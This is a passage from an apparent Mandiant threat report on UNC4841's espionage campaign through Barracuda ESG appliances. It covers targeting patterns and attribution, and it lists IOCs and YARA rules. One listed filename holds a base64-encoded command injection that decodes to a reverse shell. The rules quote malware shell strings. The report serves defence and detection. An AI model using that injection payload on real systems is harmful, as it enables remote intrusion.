These factors support the assessment that the\r\ncampaign had an espionage motivation.\r\nFigure 15: Government agencies worldwide appear to have been disproportionately targeted\r\nAround Barracuda’s May 23, 2023 announcement of CVE-2023-2868 and its remediation guidance (the patch itself had\r\nbeen released on May 20), new malware was deployed by the threat actor beginning on May 22, 2023. These malware\r\nfamilies included SKIPJACK, DEPTHCHARGE, FOXGLOVE, FOXTROT, and a new version of SEASPY tracked as\r\nSEASPY V2. The first new payload observed was SEASPY v2 on May 22, 2023, followed by DEPTHCHARGE, FOXGLOVE,\r\nand FOXTROT from May 30, 2023 through early June. Interestingly, organizations that received these post-remediation\r\nmalware families were weighted towards government (national), high tech, and information technology sectors. This may\r\nsuggest a threat actor prioritization towards conventional espionage targets, and maintaining access to IT and managed\r\nservice providers.\r\nFigure 16: Post-remediation UNC4841 malware deployment by sector\r\nNotably, among North American identified affected organizations, there were numerous state, provincial, county, tribal, city,\r\nand town offices that were targeted in this campaign. These organizations included municipal offices, law enforcement\r\noffices, judiciaries of varying levels, social service offices, and several incorporated towns. While overall local government\r\ntargeting comprises just under seven percent of all identified affected organizations, this statistic increases to nearly\r\nseventeen percent when compared to U.S.-based targeting alone. In some instances, targeted entities had populations below\r\n10,000 individuals. Local government targeting occurred mostly in the initial months of CVE-2023-2868 exploitation, with\r\nthe majority of observed compromises beginning from October through December 2022. 
The volume of local government\r\norganizations impacted by UNC4841 post-remediation tools has since fallen to only 8 percent of observed impacted\r\norganizations. This decline may represent an evolving operational priority for UNC4841 over the duration of sustained\r\nthreat activity.\r\nRegional information technology providers in the United States and Europe experienced a statistically notable volume of\r\ntargeting among early instances of exploitation in which SALTWATER, SEASPY, and SEASIDE were delivered. These\r\npayloads were delivered as part of the initial compromise by UNC4841 without further actions on objectives carried out on\r\nthe infected device. Mandiant does not maintain thorough visibility into adversary actions during the earlier stages of the\r\ncampaign. However, we note that several indications were discovered during incident response, which demonstrate the\r\nactors were removing traces of their malicious activity on impacted devices. One possible conclusion from these three malware\r\nfamilies being observed in isolation is that the adversary had not yet prioritized the infected appliances for further compromise\r\nand deployment of later-stage tools attributed to UNC4841. Alternatively, we recognize that subsequent tooling and\r\nindications of malicious activity may have been removed by the actors prior to the start of remediation engagements.\r\nFrom October 2022 to February 2023, the heightened volume of impacted IT and MSP providers with solely the initial\r\npayloads delivered may have been an attempt by UNC4841 to establish an initial foothold within this type of Barracuda\r\nESG environment. Few of these impacted targets received later stage payloads or were associated with targeted commands\r\nthat sought to exfiltrate data pertaining to specific users. 
Mandiant assesses with low confidence that this may suggest these\r\norganizations were targeted in an attempt to maximize access to domains managed by Barracuda ESG servers, rather than\r\nthe IT providers being the intended final target of exploitation. Barracuda ESG allows the management of numerous email\r\ndomains for the scanning of inbound email attachments, and information technology providers and managed service\r\nproviders may be positioned to manage a greater variety of downstream customer email domains when compared to a single\r\nenterprise server. Additionally, as previously noted, high tech and information technology providers were the second most\r\ntargeted sector by UNC4841 post-remediation tooling.\r\nA deeper examination of identified affected organizations showed a recurring targeting of sectors that are key to global\r\ngovernments maintaining a competitive technological and economic edge in the face of impending strategic state deadlines.\r\nEntities were observed within the semiconductor, public health, aerospace, artificial intelligence/autonomous vehicles, and\r\nrare earth metal production sectors. Further, religious based organizations were impacted by UNC4841 campaigns. A cluster\r\nof organizations with mission-based aid or stated evangelical missions that impact China (and Chinese claimed geographies\r\nsuch as Hong Kong and Taiwan) were observed being targeted with the initial stages of malware utilized by this threat actor.\r\nUnlike numerous impacted organizations that align with traditional espionage requirements, these entities only received\r\nearly stage implants such as SALTWATER, SEASPY, and SEASIDE. 
This may suggest a lower priority among UNC4841\r\ncollection requirements, with evidence of deeper compromise, persistence, and exfiltration being observed among entities\r\naligning with more conventional geopolitical, defense, and technology related mandates.\r\nBased on the evidence available at the time of analysis, the earliest compromises appear to have occurred on a small subset of\r\nappliances geolocated to mainland China. The C2 communications utilized during this early set of compromises also\r\nleveraged port 8080, while later compromises that occurred globally almost entirely leveraged port 443 or port 25.\r\nAttribution\r\nMandiant has previously assessed with high confidence that UNC4841 conducts espionage activity in support of the\r\nPeople’s Republic of China. Our assessment has not changed and has now been corroborated by independent assessments\r\nfrom government agencies. As we mentioned in our first blog post, several overlaps with other China-nexus actors have\r\nbeen identified throughout our investigation. However, Mandiant has not attributed activity tracked as UNC4841 to a\r\npreviously known threat actor.\r\nHigher-level Trends in Chinese Cyber Espionage Operations\r\nEarly in our investigation, we identified overlaps in infrastructure used by UNC4841 with that which we have associated\r\nwith UNC2286, another China-nexus actor that we have observed active since at least 2019 and which has heavily targeted\r\norganizations in the Southeast Asia region. Activity Mandiant has attributed to UNC2286 overlaps with public reporting\r\non GhostEmperor (Kaspersky) and FamousSparrow (ESET). While this finding does indicate a connection in the\r\ninfrastructure used by both groups, it is likely an artifact of a shared infrastructure anonymization service or an infrastructure\r\nprovider that is common between them. 
 \r\nAdditionally, Mandiant has recently observed another sophisticated espionage-focused China-nexus actor, UNC3886,\r\ndeploying custom malware based on modified REPTILE source code, similar to FOXTROT. A recent UNC3886 campaign\r\nleveraged a zero-day exploit for Fortinet appliances as well as an ecosystem of custom malware which included UNC3886’s\r\nbackdoor CASTLETAP, which is adapted from REPTILE and designed to be utilized on FortiGate appliances. CASTLETAP\r\nachieves functionality similar to SEASPY and is also designed to passively listen for magic packets that activate the\r\nbackdoor functionality and connect back to a C2 server with SSL encryption. Other malware families deployed by\r\nUNC3886 have also shown similar characteristics to those deployed by UNC4841. For example, DRIEDMOAT is another\r\nsimilar passive backdoor that has been observed with an embedded certificate stolen from the compromised appliance that it\r\nuses to encrypt its C2 communications, much like the technique we observed from UNC4841.\r\nShared infrastructure and techniques for anonymization are common amongst Chinese cyber espionage actors, as is shared\r\ntooling and likely malware development resources. Mandiant assesses that these observations are evidence of the higher-level\r\ntrends we have observed in Chinese cyber espionage and the evolution toward more purposeful, stealthy, and effective\r\noperations that avoid detection and complicate attribution. It is likely that we will continue to observe Chinese cyber\r\nespionage operations targeting edge infrastructure with zero-day vulnerabilities and the deployment of malware customized\r\nto specific appliance ecosystems.\r\nOutlook and Implications\r\nOver the course of the investigation, UNC4841 has proven to be highly responsive to defensive efforts and has actively\r\nmodified TTPs to maintain access within victim environments to continue their espionage operation. 
Mandiant strongly\r\nrecommends impacted Barracuda customers continue to hunt for UNC4841 activity within networks impacted by a\r\ncompromised ESG. Due to their demonstrated sophistication and proven desire to maintain access, Mandiant expects\r\nUNC4841 to continue to alter their TTPs and modify their toolkit as network defenders continue to take action against this\r\nadversary, and their activity is further exposed by the security community. Mandiant anticipates UNC4841 will continue to\r\ntarget edge devices in the future. To aid in hunting UNC4841 activity, IOCs and detection rules can be found in\r\nthe sections that follow.\r\nIf you were impacted by this campaign, Mandiant recommends you contact the FBI at sf-barracudacve@fbi.gov.\r\nAcknowledgements\r\nWe would like to thank the U.S. Cybersecurity \u0026 Infrastructure Security Agency (CISA) for their continued partnership and\r\ncontributions to this report, as well as the Federal Bureau of Investigation (FBI) for their ongoing collaboration and\r\nassistance in notifying impacted organizations. We would also like to thank the Australian Signals Directorate’s (ASD)\r\nAustralian Cyber Security Centre (ACSC) for assistance in notifying victims. 
Additionally, we would like to thank\r\nBarracuda Networks for their decisive actions, transparency and partnership following the exploitation of CVE-2023-2868\r\nby UNC4841.\r\nIndicators of Compromise (IOCs)\r\nNetwork IOCs\r\nIP Address ASN NetBlock Location\r\n101.229.146.218 4812 China Telecom CN\r\n103.146.179.101 136933 Gigabitbank Global HK\r\n103.27.108.62 132883 Topway Global Limited HK\r\n103.77.192.87 10222 Multibyte Info Technology Limited HK\r\n103.146.179.69 10222 Multibyte Info Technology Limited HK\r\n103.77.192.13 10222 Multibyte Info Technology Limited HK\r\n103.77.192.88 10222 Multibyte Info Technology Limited HK\r\n103.93.78.142 61414 Edgenap Ltd JP\r\n104.156.229.226 20473 Choopa, LLC US\r\n104.223.20.222 8100 CloudVPS US\r\n107.148.149.156 399195 Pegtechinc-ap-04 US\r\n107.148.219.227 54600 Peg Tech US\r\n107.148.219.53 54600 Peg Tech US\r\n107.148.219.54 54600 Peg Tech US\r\n107.148.219.55 54600 Peg Tech US\r\n107.148.223.196 54600 Peg Tech US\r\n107.173.62.158 20278 Nexeon Technologies US\r\n113.52.106.3 4609 Companhia de Telecomunicacoes de Macau SARL HK\r\n137.175.19.25 54600 Peg Tech US\r\n137.175.28.251 54600 Peg Tech US\r\n137.175.30.36 54600 Peg Tech US\r\n137.175.30.86 54600 Peg Tech US\r\n137.175.51.147 54600 Peg Tech US\r\n137.175.53.17 54600 Peg Tech US\r\n137.175.53.170 54600 Peg Tech US\r\n137.175.53.218 54600 Peg Tech US\r\n137.175.60.252 54600 Peg Tech US\r\n137.175.60.253 54600 Peg Tech US\r\n137.175.78.66 54600 Peg Tech US\r\n139.84.227.9 20473 Choopa, LLC ZA\r\n155.94.160.72 8100 CloudVPS US\r\n155.94.160.95 8100 ASN-QUADRANET-GLOBAL US\r\n182.239.114.135 9231 China Mobile Hong Kong HK\r\n182.239.114.254 9231 China Mobile Hong Kong HK\r\n185.243.41.209 61414 Edgenap Ltd 
JP\r\n192.74.226.142 54600 Peg Tech CN\r\n192.74.254.229 54600 Peg Tech US\r\n195.234.82.132 202422 G-Core Labs S.A. US\r\n198.2.254.219 54600 Peg Tech US\r\n198.2.254.220 54600 Peg Tech US\r\n198.2.254.221 54600 Peg Tech US\r\n198.2.254.222 54600 Peg Tech US\r\n198.2.254.223 54600 Peg Tech US\r\n199.247.23.80 20473 Choopa, LLC DE\r\n213.156.153.34 202422 G-Core Labs S.A. US\r\n216.238.112.82 20473 Choopa, LLC BR\r\n23.224.42.5 40065 Choopa, LLC US\r\n23.224.42.29 40065 Cnservers LLC US\r\n23.224.78.130 40065 Cnservers LLC US\r\n23.224.78.131 40065 Cnservers LLC US\r\n23.224.78.132 40065 Cnservers LLC US\r\n23.224.78.133 40065 Cnservers LLC US\r\n23.224.78.134 40065 Cnservers LLC US\r\n37.9.35.217 202422 G-Core Labs S.A. US\r\n38.54.1.82 138915 Kaopu Cloud HK Limited SG\r\n38.54.113.205 138915 Kaopu Cloud HK Limited MY\r\n38.60.254.165 174 Cogent Communications US\r\n45.148.16.42 42675 Obehosting AB DK\r\n45.148.16.46 42675 Obehosting AB DK\r\n45.154.253.153 41634 Svea Hosting AB GB\r\n45.154.253.154 41634 Svea Hosting AB GB\r\n45.63.76.67 20473 Choopa, LLC US\r\n51.91.79.17 16276 OVH SAS FR\r\n52.23.241.105 14618 Amazon.com US\r\n54.197.109.223 14618 AMAZON-AES US\r\n64.176.4.234 20473 Choopa, LLC US\r\n64.176.7.59 20473 Choopa, LLC US\r\nDomains\r\nbestfindthetruth[.]com\r\ngoldenunder[.]com\r\nnote.goldenunder[.]com\r\nsingamofing[.]com\r\nsingnode[.]com\r\nmx01.bestfindthetruth[.]com\r\nxxl17z.dnslog[.]cn\r\nHost IOCs\r\nHash Filename\r\n06528143748b54793b2a7561d96138c5 abcdefg=qwesdnfkjsdhijklmnopqrstuvwxynanfasdjkfjksajdfkljeklnfisndfnhishdfhnsdanfsdnfhhhfhasdfjkqwe\r\n4495cb72708f486b734de6b6c6402aba 
abcdefg=a123sdffsdfsdafsadfasdfsadfhijklmnopqrstuvwxyzssdffggsdfasdfafjklsadjfneiunsdfhnsndfn52023.tx\r\n61514ac639721a51e98c47f2ac3afe81 abcdefg=abcdfwdsaifnihdnfgiyushadhijklmnopqrstuvwxyznfhjhauidsdfasdsdfqwer5we212rsahfeadssbn3741\r\nf667939000c941e5b9dc91303c98b7fc abcdefg=aasadfewsdfsadnhijklmnopqrstuvwxyzxcjvueortyuiqwnem,nxcnngvmdfngkdjfgkjdiogjevdsfvjdfjvk\r\nfe1e2d676c91f899b706682b70176983\r\nabcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsI\r\n$abcdefg|${ee}se64 -d|${G}h;wh66489.txt\r\n0d67f50a0bf7a3a017784146ac41ada0 snapshot.tar\r\n7a31d314247ac33ae39a9248b770d717 snapshot.tar\r\n206b05ef55aff6fa453ba8e5f6c55167 imgfile.jpg\r\n42722b7d04f58dcb8bd80fe41c7ea09e 11111.tar\r\n5392fb400bd671d4b185fb35a9b23fd3 snapshot.tar\r\n878cf1de91f3ae543fd290c31adcbda4 snapshot.tar\r\nac4fb6d0bfc871be6f68bfa647fc0125 abcdefg=aasadfewsdfsadnhijklmnopqrstuvwxyzxcjvueortyuiqwnem,nxcnngvmdfngkdjfgkjdiogjevdsfvjdfjvk\r\n479315620c9a5a62a745ab586ba7b78c unknown\r\n683acdb559bbc7fb64431d1f579a8104 unknown\r\nef00c92fa005c2f61ec23d5278a8fa25 unknown\r\nff4f425be50bacbb10f16287aaddb7e3 unknown\r\n94b6f76da938ef855a91011f16252d59 core_check.sh\r\n32ffe48d1a8ced49c53033eb65eff6f3 BarracudaMailService.1\r\n8406f74ac2c57807735a9b86f61da9f9 intent\r\nd81263e6872cc805e6cf4ca05d86df4e mod_content.lua\r\nda06e7c32f070a9bb96b720ef332b50b nfsd.ko\r\nc5c93ba36e079892c1123fe9dffd660f unknown\r\n19e373b13297de1783cecf856dc48eb0 client_linux\r\nc56d7b86e59c5c737ee7537d7cf13df1 autoins\r\ncb0f7f216e8965f40a724bc15db7510b update_v35.sh\r\n881b7846f8384c12c7481b23011d8e45 update_v31.sh\r\nf5ab04a920302931a8bd063f27b745cc intent_helo\r\n0245e7f9105253ecb30de301842e28e4 unknown\r\n0c227990210e7e9d704c165abd76ebe2 
unknown\r\n132a342273cd469a34938044e8f62482 unknown\r\n1bc5212a856f028747c062b66c3a722a unknown\r\n2d841cb153bebcfdee5c54472b017af2 rc\r\n2e30520f8536a27dd59eabbcb8e3532a unknown\r\n349ca242bc6d2652d84146f5f91c3dbb intentbas\r\n3e3f72f99062255d6320d5e686f0e212 unknown\r\n4c1c2db989e0e881232c7748593d291e unknown\r\n7d7fd05b262342a9e8237ce14ec41c3b unknown\r\n8fc03800c1179a18fbd58d746596fa7d update_version\r\na45ca19435c2976a29300128dc410fd4 unknown\r\nba7af4f98d85e5847c08cf6cefdf35dc rc\r\nc528b6398c86f8bdcfa3f9de7837ebfe update_v2.sh\r\nc7a89a215e74104682880def469d4758 unknown\r\nc979e8651c1f40d685be2f66e8c2c610 rc\r\nd1392095086c07bd8d2ef174cb5f6ca8 intent_bas\r\nad1dc51a66201689d442499f70b78dea unknown\r\ndde2d3347b76070fff14f6c0412f95ba run.sh\r\n858174c8f4a45e9564382d4480831c6b unknown\r\n2ccb9759800154de817bf779a52d48f8 update_v31.sh\r\n177add288b289d43236d2dba33e65956 pd\r\ne52871d82de01b7e7f134c776703f696 rverify\r\n336c12441b7a678280562729c974a840 unknown\r\n5fdee67c82f5480edfa54afc5a9dc834 install_bvp74_auth.tar\r\n407738e565b4e9dafb07b782ebcf46b0 unknown\r\n67a4556b021578e0a421fdc251f07e04 install_bvp74_auth.tar\r\n694cdb49879f1321abb4605adf634935 install_bvp74_auth.tar\r\n6f79ef58b354fd33824c96625590c244 intent_reuse\r\n7ebd5f3e800dcd0510cfcbe2351d3838 unknown\r\nd098fe9674b6b4cb540699c5eb452cb5 test.sh\r\n03e07c538a5e0e7906af803a83c97a1e r\r\n0dd78b785e7657999d05d52a64b4c4cf unknown\r\n35a432e40da597c7ab63ff16b09d19d8 unknown\r\n806250c466824a027e3e85461dc672db hw-set\r\n830fca78440780aef448c862eee2a8ac hw-set\r\nb354111afc9c6c26c1475e761d347144 hw-set\r\nb745626b36b841ed03eddfb08e6bb061 libutil.so\r\nb860198feca7398bc79a8ec69afc65ed hw-set\r\nc2e577c71d591999ad5c581e49343093 
run.sh\r\ne68cd991777118d76e7bce163d8a2bc1 hw-set\r\ned648c366b6e564fc636c072bbcac907 reprod_run.sh\r\nff005f1ff98ec1cd678785baa0386bd1 hw-set\r\na28de396aa91b7faca35e861b634c502 foxdoor_shell\r\n1b1830abaf95bd5a44aa3873df901f28 unknown\r\n1fea55b7c9d13d822a64b2370d015da7 mod_udp.so\r\n3b93b524db66f8bb3df8279a141734bb mod_rtf.so.so\r\n4cd0f3219e98ac2e9021b06af70ed643 mod_udp.so\r\n4ec4ceda84c580054f191caa09916c68 mod_rft.so\r\n64c690f175a2d2fe38d3d7c0d0ddbb6e mod_udp.so\r\n827d507aa3bde0ef903ca5dec60cdec8 mod_udp.so\r\n831d41ba2a0036540536c2f884d089f9 sendscd\r\n8fdf3b7dc6d88594b8b5173c1aa2bc82 mod_rft.so\r\n9bc6d6af590e7d94869dee1d33cc1cae unknown\r\nb601fce4181b275954e3f35b18996c92 install_reuse\r\n9033dc5bac76542b9b752064a56c6ee4 nfsd_stub.ko\r\ncd2813f0260d63ad5adf0446253c2172 require_helo.lua\r\ncd2813f0260d63ad5adf0446253c2576 unknown\r\n666da297066a2596cacb13b3da9572bf mod_sender.lua\r\n35cf6faf442d325961935f660e2ab5a0 mod_attachment.lua\r\nce67bb99bc1e26f6cb1f968bc1b1ec21 unknown\r\n025046adfa7b2cf50f86f5e0c6bb2ab7 unknown\r\n0805b523120cc2da3f71e5606255d29c resize_reisertab\r\n17696a438387248a12cc911fbae8620e resize_reisertab\r\n19ebfe05040a8508467f9415c8378f32 BarracudaMailService\r\n1b92e5455de794af560f10a907d931cc resize2fstab\r\n1bbb32610599d70397adfdaf56109ff3 BarracudaMailService\r\n23f4f604f1a05c4abf2ac02f976b746b unknown\r\n3c20617f089fe5cc9ba12c43c6c072f5 unknown\r\n45b79949276c9cb9cf5dc72597dc1006 resize_reisertab\r\n4b511567cfa8dbaa32e11baf3268f074 BarracudaMailService\r\n4ca4f582418b2cc0626700511a6315c0 BarracudaMailService\r\n5d6cba7909980a7b424b133fbac634ac BarracudaMailService\r\n69ef9a9e8d0506d957248e983d22b0d5 resize2fstab\r\n724079649f690ca1ee80b8b3125b58b9 unknown\r\n76811232ede58de2faf6aca8395f8427 
resize2fstab\r\n82eaf69de710abdc5dea7cd5cb56cf04 BarracudaMailService\r\n8f1c40bd3ab33d517839ca17591d8666 resize2fstab\r\na08a99e5224e1baf569fda816c991045 BarracudaMailService\r\nbef722484288e24258dd33922b1a7148 resize2fstab\r\nd8e748b1b609d376f57343b2bde94b29 unknown\r\ndb4c48921537d67635bb210a9cb5bb52 BarracudaMailService\r\ne80a85250263d58cc1a1dc39d6cf3942 BarracudaMailService\r\nf6857841a255b3b4e4eded7a66438696 unknown\r\nfe031a93c84aa3d01e2223a6bb988fa0 unknown\r\n3273a29d15334efddd8276af53c317fb mknod\r\n446f3d71591afa37bbd604e2e400ae8b mknod\r\n87847445f9524671022d70f2a812728f mod_content.lua\r\n9aa90d767ba0a3f057653aadcb75e579 unknown\r\ne4e86c273a2b67a605f5d4686783e0cc mknod\r\nec0d46b2aa7adfdff10a671a77aeb2ae unknown\r\n436587bad5e061a7e594f9971d89c468 saslautchd\r\n85c5b6c408e4bdb87da6764a75008adf rverify\r\nf013a111044f3228b978f49e1ee374fe mod_attachment.lua\r\n90a75b588f63c6a0294a48e93628aec9 nfsd_stub.ko\r\nDetection Rules\r\nYARA Rules\r\nrule M_APT_Installer_SKIPJACK_1 {\r\nmeta:\r\n author = \"Mandiant\"\r\n md5 = \"e4e86c273a2b67a605f5d4686783e0cc\"\r\nstrings:\r\n $str1 = \"hdr:name() == 'Content-ID'\" base64\r\n $str2 = \"hdr:body() ~= nil\" base64\r\n $str3 = \"string.match(hdr:body(),\\\"^[%w%+/=\\\\r\\\\n]+$\\\")\" base64\r\n $str4 = \"openssl aes-256-cbc\" base64\r\n $str5 = \"mod_content.lua\"\r\n $str6 = \"#!/bin/sh\"\r\ncondition:\r\n all of them\r\n}\r\nSKIPJACK Installer\r\nrule M_APT_Backdoor_SKIPJACK_1 {\r\nmeta:\r\n author = \"Mandiant\"\r\n md5 = \"87847445f9524671022d70f2a812728f\"\r\nstrings:\r\n $str1 = \"hdr:name() == 'Content-ID'\"\r\n $str2 = \"hdr:body() ~= nil\"\r\n $str3 = \"string.match(hdr:body(),\\\"^[%w%+/=\\\\r\\\\n]+$\\\")\"\r\n $str4 = \"openssl aes-256-cbc\"\r\n $str5 = \"| base64 -d| sh 2\u003e\"\r\ncondition:\r\n all of them\r\n}\r\nSKIPJACK Backdoor\r\nrule M_APT_Backdoor_DEPTHCHARGE_1 
{\r\nmeta:\r\n author = \"Mandiant\"\r\n md5 = \"b745626b36b841ed03eddfb08e6bb061\"\r\nstrings:\r\n $backdoor_command_main = { 65 63 68 6F 20 2D 6E 20 27 25 73 27 20 7C (20 62 61 73 65 36 34 20 2D 64 20 7C 20 | 20 ) 6F 7\r\n $e1 = \"welcomeflag\" fullword\r\n $e2 = \"welcomebuffer\" fullword\r\n $e3 = \"launch_backdoor\" fullword\r\n $e4 = \"backdoor_initalize\" fullword\r\n $s1 = \"BSMTP_ID\" fullword\r\n $s2 = \"result %d\" fullword\r\n $s3 = \"ehlo\" fullword\r\ncondition:\r\n uint32(0)==0x464c457f and $backdoor_command_main and 4 of them\r\n}\r\nDEPTHCHARGE\r\nrule M_APT_Launcher_FOXGLOVE_1 {\r\nmeta:\r\n author = \"Mandiant\"\r\n md5 = \"c9ae8bfd08f57d955465f23a5f1c09a4\"\r\nstrings:\r\n $str1 = { 48 ?? 66 6F 78 64 6F 6F 72 5F 48 89 ?? C7 ?? ?? 73 68 65 6C 66 C7 ?? ?? 6C 00 }\r\n $str2 = { 48 ?? 2F 75 73 72 2F 73 68 61 48 ?? 72 65 2F 66 6F 78 64 6F 48 89 ?? 48 89 ?? ?? 48 ?? 
6F 72 2F 66 6F 78 64 6F\r\n $str3 = \"shell\"\r\n $str4 = \"start.c\"\r\n $str5 = \"base64en\"\r\n $str6 = \"base64de\"\r\n $str7 = \"-r\"\r\n $str8 = \"-s\"\r\n $str9 = \"-p\"\r\n $str10 = \"-t\"\r\ncondition:\r\n uint32(0) == 0x464c457f and all of them\r\n}\r\nFOXGLOVE\r\nrule M_APT_Backdoor_FOXTROT_1 {\r\nmeta:\r\n author = \"Mandiant\"\r\n md5 = \"a28de396aa91b7faca35e861b634c502\"\r\nstrings:\r\n $str1 = \"/usr/share/foxdoor/uuid\"\r\n $str2 = \"/.mozilla/firefox/\"\r\n $str3 = \"hide_foxdoor_mod\"\r\n $str4 = \"POST /api/index.cgi\"\r\n $str5 = \"7(Zu9YTsA7qQ#vw\"\r\n $str6 = \"CONNECT %s:%d HTTP/1.1\"\r\n $str7 = \"network.proxy.http_port\"\r\n $str8 = \"exec bash --rcfile\"\r\ncondition:\r\n uint32(0) == 0x464c457f and all of them\r\n}\r\nFOXTROT\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\r\nVID Name\r\nA106-709\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #10\r\nA106-710\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #2\r\nA106-711\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #3\r\nA106-712\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #11\r\nA106-713\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #4\r\nA106-714\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #5\r\nA106-715\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #8\r\nA106-716\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #7\r\nA106-717\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #6\r\nA106-718\r\nCommand and Control\r\nUNC4841, DNS Query, Variant #9\r\nA106-719\r\nMalicious File Transfer\r\nUNC4841, DEPTHCHARGE, Download, Variant #1\r\nA106-720\r\nMalicious File Transfer\r\nUNC4841, SALTWATER, Download, Variant #2\r\nA106-721\r\nMalicious File Transfer\r\nUNC4841, FOXTROT, 
Download, Variant #1\r\nA106-722\r\nMalicious File Transfer\r\nUNC4841, SKIPJACK, Download, Variant #2\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation"
	],
	"report_names": [
		"unc4841-post-barracuda-zero-day-remediation"
	],
	"threat_actors": [
		{
			"id": "a2c3c22a-b3db-4d4a-9a5a-76bfe6171843",
			"created_at": "2023-11-21T02:00:07.315543Z",
			"updated_at": "2026-04-10T02:00:03.461446Z",
			"deleted_at": null,
			"main_name": "UNC4841",
			"aliases": [
				"SLIME57"
			],
			"source_name": "MISPGALAXY:UNC4841",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f0eca237-f191-448f-87d1-5d6b3651cbff",
			"created_at": "2024-02-06T02:00:04.140087Z",
			"updated_at": "2026-04-10T02:00:03.577326Z",
			"deleted_at": null,
			"main_name": "GhostEmperor",
			"aliases": [
				"OPERATOR PANDA",
				"FamousSparrow",
				"UNC2286",
				"Salt Typhoon",
				"RedMike"
			],
			"source_name": "MISPGALAXY:GhostEmperor",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9df8987a-27fc-45c5-83b0-20dceb8288af",
			"created_at": "2025-10-29T02:00:51.836932Z",
			"updated_at": "2026-04-10T02:00:05.253487Z",
			"deleted_at": null,
			"main_name": "UNC3886",
			"aliases": [
				"UNC3886"
			],
			"source_name": "MITRE:UNC3886",
			"tools": [
				"MOPSLED",
				"VIRTUALPIE",
				"CASTLETAP",
				"THINCRUST",
				"VIRTUALPITA",
				"RIFLESPINE"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a08d93aa-41e4-4eca-a0fd-002d051a2c2d",
			"created_at": "2024-08-28T02:02:09.711951Z",
			"updated_at": "2026-04-10T02:00:04.957678Z",
			"deleted_at": null,
			"main_name": "UNC3886",
			"aliases": [
				"Fire Ant"
			],
			"source_name": "ETDA:UNC3886",
			"tools": [
				"BOLDMOVE",
				"CASTLETAP",
				"LOOKOVER",
				"MOPSLED",
				"RIFLESPINE",
				"TABLEFLIP",
				"THINCRUST",
				"Tiny SHell",
				"VIRTUALGATE",
				"VIRTUALPIE",
				"VIRTUALPITA",
				"VIRTUALSHINE",
				"tsh"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1c91699d-77d3-4ad7-9857-9f9196ac1e37",
			"created_at": "2023-11-04T02:00:07.663664Z",
			"updated_at": "2026-04-10T02:00:03.385989Z",
			"deleted_at": null,
			"main_name": "UNC3886",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC3886",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d390d62a-6e11-46e5-a16f-a88898a8e6ff",
			"created_at": "2024-12-28T02:01:54.899899Z",
			"updated_at": "2026-04-10T02:00:04.880446Z",
			"deleted_at": null,
			"main_name": "Salt Typhoon",
			"aliases": [
				"Earth Estries",
				"FamousSparrow",
				"GhostEmperor",
				"Operator Panda",
				"RedMike",
				"Salt Typhoon",
				"UNC2286"
			],
			"source_name": "ETDA:Salt Typhoon",
			"tools": [
				"Agentemis",
				"Backdr-NQ",
				"Cobalt Strike",
				"CobaltStrike",
				"Crowdoor",
				"Cryptmerlin",
				"Deed RAT",
				"Demodex",
				"FamousSparrow",
				"FuxosDoor",
				"GHOSTSPIDER",
				"HemiGate",
				"MASOL RAT",
				"Mimikatz",
				"NBTscan",
				"NinjaCopy",
				"ProcDump",
				"PsExec",
				"PsList",
				"SnappyBee",
				"SparrowDoor",
				"TrillClient",
				"WinRAR",
				"Zingdoor",
				"certutil",
				"certutil.exe",
				"cobeacon",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434417,
	"ts_updated_at": 1775791825,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/03f2b901f28993757ec9aaefff97e443035b7190.pdf",
		"text": "https://archive.orkl.eu/03f2b901f28993757ec9aaefff97e443035b7190.txt",
		"img": "https://archive.orkl.eu/03f2b901f28993757ec9aaefff97e443035b7190.jpg"
	}
}